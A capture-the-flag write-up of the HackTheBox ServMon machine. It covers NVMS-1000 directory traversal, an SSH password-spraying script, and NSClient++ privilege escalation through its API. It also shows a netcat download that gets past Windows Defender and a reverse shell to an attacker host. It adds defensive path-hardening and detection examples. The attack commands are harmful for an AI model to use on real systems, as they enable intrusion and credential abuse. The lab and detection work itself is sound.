2/3/2024
Dive into the tactical journey of penetrating the ServMon machine on HackTheBox, a challenge designed for cybersecurity enthusiasts. This write-up unfolds the process of breaching a Windows-based server, leveraging a vulnerable NVMS-1000 setup. Discover how a meticulously crafted password-spraying tactic unlocks initial access, setting the stage for deeper system exploration. The narrative progresses through strategic privilege escalation, utilizing NSClient++ weaknesses to gain ultimate control. This exploration not only demonstrates practical attack techniques but also some very basic Windows Defender evasion.
A simple box that has some issues: there are issues with the web apps, and Windows Defender was enabled, which caused some minor trouble. It is simple nonetheless, but it involves a lot of reading the documentation for the application.
The IP of the machine is 10.10.10.184.
We start with the typical IppSec scan.
nmap -sC -sV -oA nmap/ServMon 10.10.10.184
Interesting ports: 21, 80, 139, 445, 8443.
We can try anonymous FTP and SMB logins.
There are also two web apps that we can take a look at if those things don't work.
Anonymous FTP works!
There are two files present in Users\Nadine\Confidential.txt and Users\Nathan\Notes to do.txt.
We know that there is a Passwords.txt file on Nathan's Desktop and that it has not been removed.
We can see that the web app is running NVMS-1000. A quick Google search for "NVMS-1000 exploits" gives us CVE-2019-20085, a directory traversal vulnerability.
We can try to fish for the Passwords.txt file. We know that it is in Nathan's Desktop directory, so the path is Users/Nathan/Desktop/Passwords.txt.
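To make the vulnerability class concrete, here is an added example (not code from the write-up or from NVMS-1000) showing a request-path resolver in its vulnerable form beside a hardened one. The web root is an assumed placeholder path; the hardened version decodes repeatedly, normalises Windows separators, collapses the path and then refuses anything that does not stay inside the root.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed web root for this example (placeholder path, not NVMS-1000's real layout).
WEB_ROOT = "/var/www/nvms"


def naive_resolve(requested: str) -> str:
    """Vulnerable form: the request path is joined onto the web root unchecked,
    so ".." segments walk straight out of the root (CVE-2019-20085 style)."""
    return posixpath.normpath(WEB_ROOT + "/" + requested)


def _fully_decode(s: str) -> str:
    """Percent-decode until the string stops changing, so double-encoded
    sequences such as %252e%252e are seen as the '..' they become."""
    prev = None
    while prev != s:
        prev, s = s, unquote(s)
    return s


def safe_resolve(requested: str) -> Optional[str]:
    """Hardened form: decode, normalise separators, collapse the path, then
    require the result to lie inside WEB_ROOT. Returns None to refuse."""
    decoded = _fully_decode(requested)
    if "\x00" in decoded:                      # NUL can truncate paths in native code
        return None
    decoded = decoded.replace("\\", "/")       # Windows targets accept both separators
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("index.html", "css/../index.html",
                "../../../Users/Nathan/Desktop/Passwords.txt",
                "..\\..\\..\\Users\\Nathan\\Desktop\\Passwords.txt",
                "%252e%252e/%252e%252e/%252e%252e/etc/passwd"):
        print(f"{req!r:55} naive={naive_resolve(req)!r:50} safe={safe_resolve(req)!r}")
```

The check compares the normalised candidate against the root as a string prefix with a trailing separator, which is what stops `/var/www/nvms-other` from passing as "inside" `/var/www/nvms`.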
Let us create a quick users.txt and passwd.txt.

users.txt:
Nathan
Nadine
administrator

passwd.txt:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Since I can't use Metasploit on the OSCP, I will write a quick SSH brute-force script.
import paramiko

usernames_file = 'users.txt'
passwords_file = 'passwd.txt'
target_hostname = '10.10.10.184'
port = 22


def attempt_login(hostname, port, username, password):
    # One SSH password attempt; paramiko raises AuthenticationException on a wrong password.
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname, port=port, username=username, password=password, timeout=10)
        print(f"Success: {username}:{password}")
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()


# One entry per line in each file.
with open(usernames_file, 'r') as uf:
    usernames = [line.strip() for line in uf]
with open(passwords_file, 'r') as pf:
    passwords = [line.strip() for line in pf]

# Try every password for each user; stop on the first hit for that user.
for username in usernames:
    for password in passwords:
        if attempt_login(target_hostname, port, username, password):
            print(f"Valid credentials found: {username}:{password}")
            break
Valid credentials found: Nadine:L1k3B1gBut7s@W0rk
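From the defender's side, a spray like the one above leaves a distinctive trail: one source address, several usernames, many failures, then a success. The following added example (not part of the write-up) parses constructed sshd log lines in OpenSSH's syslog format and flags a source that fails against several distinct users inside a short window; the log lines, thresholds and window are all assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd log lines for this example; not taken from the box.
SAMPLE_LOG = """\
Feb  3 10:00:01 servmon sshd[1201]: Failed password for invalid user nathan from 10.10.14.15 port 51234 ssh2
Feb  3 10:00:02 servmon sshd[1202]: Failed password for invalid user nathan from 10.10.14.15 port 51235 ssh2
Feb  3 10:00:03 servmon sshd[1203]: Failed password for nadine from 10.10.14.15 port 51236 ssh2
Feb  3 10:00:04 servmon sshd[1204]: Failed password for nadine from 10.10.14.15 port 51237 ssh2
Feb  3 10:00:05 servmon sshd[1205]: Failed password for administrator from 10.10.14.15 port 51238 ssh2
Feb  3 10:00:06 servmon sshd[1206]: Accepted password for nadine from 10.10.14.15 port 51239 ssh2
Feb  3 10:30:00 servmon sshd[1300]: Failed password for nadine from 192.168.1.20 port 40001 ssh2
Feb  3 10:31:00 servmon sshd[1301]: Accepted password for nadine from 192.168.1.20 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_events(text, year=2024):
    """Return (timestamp, source, user, accepted) tuples; syslog lines carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=3, min_failures=5):
    """Alert once per source whose failures within `window` span >= min_users
    distinct accounts or reach min_failures; report any success in that window."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        for ts, _, _, _ in evs:
            recent = [e for e in evs if ts <= e[0] <= ts + window]  # window anchored at this event
            failed_users = {e[2] for e in recent if not e[3]}
            failures = sum(1 for e in recent if not e[3])
            if len(failed_users) >= min_users or failures >= min_failures:
                alerts.append({
                    "src": src,
                    "users": sorted(failed_users),
                    "failures": failures,
                    "success_for": [e[2] for e in recent if e[3]],
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_LOG)):
        print(alert)
```

The single legitimate typo-then-login from 192.168.1.20 stays below both thresholds, while the spraying source trips the distinct-user rule on its first window and is reported together with the account it eventually got into, which is the record an incident responder wants first.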
Now, this is the part I was stuck on for a while; once I realized what I was missing, I felt quite stupid.
We know that the server is running NSClient from the notes on Nathan's FTP directory.
We can find the directory that NSClient++ runs in: C:\Program Files\NSClient++. Then we can check the version of the client.
nadine@SERVMON C:\Program Files\NSClient++>nscp --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
There is a privilege escalation exploit for this version.
The password for admin can be found in the nsclient.ini file.
We need to access NSClient++ from the attack machine, so let us port-forward using SSH.
ssh -L8443:127.0.0.1:8443 nadine@10.10.10.184
So here is the challenge: Windows Defender was enabled. This was not the default configuration of the box; however, it will be a nice challenge.
So we get a Netcat executable and host it with a Python HTTP server.
python -m http.server 8000
Now let's try to get the file.
nadine@SERVMON C:\Program Files\NSClient++>certutil -urlcache -f http://10.10.14.15:8000/nc.exe nc.exe
Access is denied.
At first, I thought I did not have write permissions, which I thought was odd, but I checked the privileges and Nadine had write permissions.
Eventually, I switched to PowerShell and tried the same command.
PS C:\Program Files\NSClient++> certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe
At line:1 char:1
+ certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
I thought it was Netcat. (It was not).
So I tried to compile Netcat from C source and changed a lot of it. That did not work. Then I tried to use a PowerShell reverse shell.
I tested the command in Nadine's shell. I had to use PowerShell #3 from revshells.com; it worked from the shell. So I tried the web UI, and it did not work either. So I looked through the documentation and found the API.
I sent the requests to the API endpoint.
curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary @rev.bat
curl -s -k -u admin:ew2x6SsGTxjRwXOT https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=10s
Still did not work! I was a bit worried. I started this box late during the day and I usually cannot sleep until I finish the box.
I decided to take a deep breath and look at what was happening, and to my surprise, the HTTP server did not get a request from the machine.
So the command itself was being blocked by Defender.
Let me try wget in PowerShell. We need to get the nc64.exe binary, since the regular binary gets removed by Windows Defender.
wget http://10.10.14.15:8000/nc64.exe -o nc.exe
OK, that works.
Let us create the .bat file now.
C:\Users\Nadine\nc.exe 10.10.14.15 9002 -e cmd.exe
Now let's run the same API commands with a listener running.
nc -lvnp 9002
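Defender blocked the first download but not the renamed 64-bit binary, which is a good reminder that signature-based blocking is only one layer. The chain above (a certutil or PowerShell download, then a netcat started by the monitoring agent) is also visible in process-creation telemetry. This added example (not from the write-up) runs a few command-line rules over constructed Sysmon-style process records; the records, field names and the `nscp.exe` parent check are assumptions for the demonstration.

```python
import re

# Constructed process-creation records (Sysmon event 1 style fields) for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -f http://10.10.14.15:8000/nc.exe nc.exe",
     "User": r"SERVMON\Nadine"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell wget http://10.10.14.15:8000/nc64.exe -o nc.exe",
     "User": r"SERVMON\Nadine"},
    {"Image": r"C:\Users\Nadine\nc.exe",
     "CommandLine": r"C:\Users\Nadine\nc.exe 10.10.14.15 9002 -e cmd.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "ParentImage": r"C:\Program Files\NSClient++\nscp.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",          # benign certutil use, should not fire
     "CommandLine": r"certutil -hashfile C:\Windows\notepad.exe SHA256",
     "User": r"SERVMON\Nadine"},
]

# Command-line patterns for living-off-the-land downloads and a socket-bound shell.
RULES = [
    ("certutil remote download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I)),
    ("powershell download cmdlet",
     re.compile(r"\b(iwr|wget|curl|Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer)\b.*\bhttps?://", re.I)),
    ("netcat with -e (shell bound to socket)",
     re.compile(r"\bnc(64)?(\.exe)?\s.*\s-e\s", re.I)),
]

# Assumed install path of the monitoring agent; anything else it spawns is suspicious.
AGENT_DIR = r"c:\program files\nsclient++"


def classify(event):
    """Return the list of rule names that match one process-creation record."""
    hits = [name for name, rx in RULES if rx.search(event["CommandLine"])]
    parent = event.get("ParentImage", "").lower()
    if parent.endswith(r"\nscp.exe") and not event["Image"].lower().startswith(AGENT_DIR):
        hits.append("unexpected child of NSClient++ (nscp.exe)")
    return hits


def scan(events):
    """Return (command line, matched rules) for every record that matched at least one rule."""
    findings = []
    for e in events:
        hits = classify(e)
        if hits:
            findings.append((e["CommandLine"], hits))
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{cmdline}\n    -> {', '.join(hits)}")
```

The parent-process rule is the one that matters most here: a monitoring agent running as SYSTEM should only ever spawn its own helpers, so any child outside its install directory is worth an alert regardless of what the command line looks like.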
Quite a fun box. Windows Defender made things tricky and forced me to do a ton of digging; however, once I figured out what to look out for, the box became quite a breeze.